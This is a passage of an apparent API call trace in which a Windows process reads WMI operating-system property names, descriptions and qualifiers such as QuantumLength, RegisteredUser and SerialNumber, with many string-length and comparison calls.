	[0050.751] IWbemClassObject:Get (in: This=0x233e12da880, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eecd8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Primary", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.751] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.751] IWbemClassObject:Get (in: This=0x233e12da880, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Primary property determines whether this is the primary operating system./nValues: TRUE or FALSE. A value of TRUE indicates this is the primary operating system.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.751] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.751] lstrlenA (lpString="") returned 0
	[0050.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0d0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.751] SysStringLen (param_1="The Primary property determines whether this is the primary operating system./nValues: TRUE or FALSE. A value of TRUE indicates this is the primary operating system.") returned 0xa5
	[0050.752] SysStringLen (param_1="") returned 0x0
	[0050.752] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.752] IWbemClassObject:Get (in: This=0x233e12da880, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.752] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.752] SysStringLen (param_1="Primary") returned 0x7
	[0050.752] SysStringLen (param_1="Description") returned 0xb
	[0050.752] SysStringLen (param_1="Primary") returned 0x7
	[0050.752] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.752] SysStringLen (param_1="Primary") returned 0x7
	[0050.752] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.752] SysStringLen (param_1="Primary") returned 0x7
	[0050.752] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.752] SysStringLen (param_1="Primary") returned 0x7
	[0050.752] SysStringLen (param_1="OSType") returned 0x6
	[0050.752] SysStringLen (param_1="Primary") returned 0x7
	[0050.752] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.752] SysStringLen (param_1="Primary") returned 0x7
	[0050.752] SysStringLen (param_1="PlusProductID") returned 0xd
	[0050.752] SysStringLen (param_1="Primary") returned 0x7
	[0050.752] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.752] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.752] SysStringLen (param_1="Primary") returned 0x7
	[0050.752] IUnknown:Release (This=0x233e12da880) returned 0x1
	[0050.753] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.753] IWbemClassObject:Get (in: This=0x233e12dab30, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12f0b18, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.753] IWbemClassObject:Get (in: This=0x233e12dab30, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12f0968, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumLength", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.753] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.753] IWbemClassObject:Get (in: This=0x233e12dab30, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The QuantumLength property defines the number of clock ticks per quantum. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to other applications. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.753] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.753] lstrlenA (lpString="") returned 0
	[0050.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.754] SysStringLen (param_1="The QuantumLength property defines the number of clock ticks per quantum. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to other applications. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.") returned 0x1c6
	[0050.754] SysStringLen (param_1="") returned 0x0
	[0050.754] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.754] IWbemClassObject:Get (in: This=0x233e12dab30, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ee9e0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1271010, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.754] SafeArrayGetLBound (in: psa=0x233e12ee9e0, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0
	[0050.754] SafeArrayGetUBound (in: psa=0x233e12ee9e0, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0
	[0050.754] SafeArrayGetElement (in: psa=0x233e12ee9e0, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0
	[0050.754] IWbemClassObject:Get (in: This=0x233e12e2ee0, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.754] IWbemClassObject:Get (in: This=0x233e12e2ee0, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eec60*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12716d0, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.754] SafeArrayGetLBound (in: psa=0x233e12eec60, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0
	[0050.754] SafeArrayGetUBound (in: psa=0x233e12eec60, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0
	[0050.754] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.754] lstrlenW (lpString="Values") returned 6
	[0050.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.754] lstrlenW (lpString="read") returned 4
	[0050.754] lstrlenW (lpString="Values") returned 6
	[0050.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0050.754] lstrlenW (lpString="write") returned 5
	[0050.754] lstrlenW (lpString="Values") returned 6
	[0050.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0050.755] lstrlenW (lpString="In") returned 2
	[0050.755] lstrlenW (lpString="Values") returned 6
	[0050.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0050.755] lstrlenW (lpString="Out") returned 3
	[0050.755] lstrlenW (lpString="Values") returned 6
	[0050.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0050.755] SafeArrayGetElement (in: psa=0x233e12eec60, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.755] SafeArrayGetElement (in: psa=0x233e12eec60, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.755] SafeArrayGetElement (in: psa=0x233e12eec60, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.755] IUnknown:Release (This=0x233e12e2ee0) returned 0x1
	[0050.755] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.755] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.755] SysStringLen (param_1="Description") returned 0xb
	[0050.755] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.755] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.755] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.756] SysStringLen (param_1="MaxNumberOfProcesses") returned 0x14
	[0050.756] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.756] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.756] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.756] SysStringLen (param_1="OSType") returned 0x6
	[0050.756] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.756] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.756] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.756] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.756] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.756] SysStringLen (param_1="Primary") returned 0x7
	[0050.756] SysStringLen (param_1="Primary") returned 0x7
	[0050.756] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.756] IUnknown:Release (This=0x233e12dab30) returned 0x1
	[0050.756] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.756] IWbemClassObject:Get (in: This=0x233e12db090, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eecd8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.756] IWbemClassObject:Get (in: This=0x233e12db090, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eee58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="QuantumType", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.756] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.756] IWbemClassObject:Get (in: This=0x233e12db090, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The QuantumType property specifies either fixed or variable length quantums. Windows NT 4.0 Workstation/Windows 2000 defaults to variable length quantums where the foreground application has a longer quantum than the background applications. Windows NT Server defaults to fixed-length quantums. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to another application. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.757] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.757] lstrlenA (lpString="") returned 0
	[0050.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1b0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.757] SysStringLen (param_1="The QuantumType property specifies either fixed or variable length quantums. Windows NT 4.0 Workstation/Windows 2000 defaults to variable length quantums where the foreground application has a longer quantum than the background applications. Windows NT Server defaults to fixed-length quantums. A quantum is a unit of execution time that the scheduler is allowed to give to an application before switching to another application. When a thread runs one quantum, the kernel preempts it and moves it to the end of a queue for applications with equal priorities. The actual length of a thread's quantum varies across different Windows platforms. For Windows NT/Windows 2000 only.") returned 0x2a4
	[0050.757] SysStringLen (param_1="") returned 0x0
	[0050.757] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.757] IWbemClassObject:Get (in: This=0x233e12db090, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ee9a0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e1271030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.757] SafeArrayGetLBound (in: psa=0x233e12ee9a0, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0
	[0050.758] SafeArrayGetUBound (in: psa=0x233e12ee9a0, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0
	[0050.758] SafeArrayGetElement (in: psa=0x233e12ee9a0, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0
	[0050.758] IWbemClassObject:Get (in: This=0x233e12e4460, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Values", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.758] IWbemClassObject:Get (in: This=0x233e12e4460, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eeda0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e12716d0, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.759] SafeArrayGetLBound (in: psa=0x233e12eeda0, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0
	[0050.759] SafeArrayGetUBound (in: psa=0x233e12eeda0, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0
	[0050.759] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.759] lstrlenW (lpString="Values") returned 6
	[0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.759] lstrlenW (lpString="read") returned 4
	[0050.759] lstrlenW (lpString="Values") returned 6
	[0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0050.759] lstrlenW (lpString="write") returned 5
	[0050.759] lstrlenW (lpString="Values") returned 6
	[0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0050.759] lstrlenW (lpString="In") returned 2
	[0050.759] lstrlenW (lpString="Values") returned 6
	[0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0050.759] lstrlenW (lpString="Out") returned 3
	[0050.759] lstrlenW (lpString="Values") returned 6
	[0050.759] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0050.759] SafeArrayGetElement (in: psa=0x233e12eeda0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.759] SafeArrayGetElement (in: psa=0x233e12eeda0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.759] SafeArrayGetElement (in: psa=0x233e12eeda0, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.759] IUnknown:Release (This=0x233e12e4460) returned 0x1
	[0050.760] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.760] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.760] SysStringLen (param_1="Description") returned 0xb
	[0050.760] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.760] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.760] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.760] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.760] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.760] SysStringLen (param_1="OSType") returned 0x6
	[0050.760] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.760] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.760] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.760] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.760] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.760] SysStringLen (param_1="Primary") returned 0x7
	[0050.760] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.760] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.760] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.760] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.760] IUnknown:Release (This=0x233e12db090) returned 0x1
	[0050.760] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.760] IWbemClassObject:Get (in: This=0x233e12dc360, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12f0938, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.760] IWbemClassObject:Get (in: This=0x233e12dc360, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12f0c98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RegisteredUser", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.761] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.761] IWbemClassObject:Get (in: This=0x233e12dc360, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The RegisteredUser property indicates the name of the registered user of the operating system./nExample: Jane Doe", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.761] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.761] lstrlenA (lpString="") returned 0
	[0050.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc180, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.761] SysStringLen (param_1="The RegisteredUser property indicates the name of the registered user of the operating system./nExample: Jane Doe") returned 0x71
	[0050.761] SysStringLen (param_1="") returned 0x0
	[0050.761] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.761] IWbemClassObject:Get (in: This=0x233e12dc360, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.761] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.762] SysStringLen (param_1="Description") returned 0xb
	[0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.762] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.762] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.762] SysStringLen (param_1="OSType") returned 0x6
	[0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.762] SysStringLen (param_1="OtherTypeDescription") returned 0x14
	[0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.762] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.762] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.762] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.762] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.762] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.762] IUnknown:Release (This=0x233e12dc360) returned 0x1
	[0050.762] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.762] IWbemClassObject:Get (in: This=0x233e12dc610, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eee58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.762] IWbemClassObject:Get (in: This=0x233e12dc610, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eef98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SerialNumber", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.762] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.763] IWbemClassObject:Get (in: This=0x233e12dc610, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The SerialNumber property indicatesthe operating system product serial identification number./nExample:10497-OEM-0031416-71674.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.763] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.763] lstrlenA (lpString="") returned 0
	[0050.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc160, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.763] SysStringLen (param_1="The SerialNumber property indicatesthe operating system product serial identification number./nExample:10497-OEM-0031416-71674.") returned 0x7f
	[0050.763] SysStringLen (param_1="") returned 0x0
	[0050.763] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.763] IWbemClassObject:Get (in: This=0x233e12dc610, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.763] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.763] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.763] SysStringLen (param_1="Description") returned 0xb
	[0050.763] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.764] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.764] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.764] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.764] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.764] SysStringLen (param_1="OSType") returned 0x6
	[0050.764] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.764] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.764] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.764] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.764] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.764] SysStringLen (param_1="QuantumType") returned 0xb
	[0050.764] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.764] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.764] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.764] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.764] IUnknown:Release (This=0x233e12dc610) returned 0x1
	[0050.764] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.764] IWbemClassObject:Get (in: This=0x233e12d9050, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eef98, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.764] IWbemClassObject:Get (in: This=0x233e12d9050, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eea18, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMajorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.764] ??0CHString@@QEAA@XZ () returned 0x350027ef68
